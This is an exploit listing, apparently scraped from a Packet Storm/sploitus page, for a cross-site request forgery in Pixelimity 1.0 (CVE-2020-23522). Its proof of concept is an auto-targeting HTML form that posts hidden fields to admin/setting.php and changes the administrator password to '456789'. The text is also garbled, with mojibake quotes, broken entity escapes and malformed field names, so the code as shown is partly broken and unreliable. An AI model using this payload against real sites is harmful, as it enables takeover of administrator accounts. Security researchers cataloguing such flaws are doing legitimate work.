Share
## https://sploitus.com/exploit?id=PACKETSTORM:161276
# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
# Date: 2020-06-03
# Exploit Author: Noth
# Vendor Homepage: https://github.com/pixelimity/pixelimity
# Software Link: https://github.com/pixelimity/pixelimity
# Version: v1.0
# CVE : 2020-23522
Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.
PoC :
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=âhttp://127.0.0.1/pixelimity-dev/admin/setting.php
â method=âPOSTâ>
<input type=âhiddenâ name=âsubmit_settingâ value=âSave Settingâ/>
<input type=âhiddenâ name=âdata[admin_portfolio_show]â
value=â5â/>
<input type=âhiddenâ name=âdata[admin_pages_show]â
value=â5â/>
<input type=âhiddenâ name=âadmin[data_password]â
value=â456789â/>
<input type=âhiddenâ name=âdata[site#95;name]"
value=âPixelimityâ/>
<input type=âhiddenâ name=âdata[site_name]show]â
value=âMy Online Portfolioâ/>
<input type=âhiddenâ name=âdata[home_image_size]â value=â5â/>
<input type=âhiddenâ name=â data[single_image_image_size#93
â value=â 240&44;0,0&44;auto â/>
<input type=âhiddenâ name=âdata[single_image_image_size#93â
value=â720&44;0,0&44;autoâ/>
<input type=âsubmitâ value=âSubmit requestâ/>
</form>
</body>
</html>